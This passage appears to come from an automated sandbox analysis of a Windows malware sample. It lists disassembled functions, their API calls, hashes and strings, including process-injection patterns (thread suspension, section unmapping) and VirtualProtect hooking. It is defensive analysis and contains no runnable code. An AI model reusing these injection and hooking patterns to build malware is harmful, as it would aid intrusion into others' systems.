    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
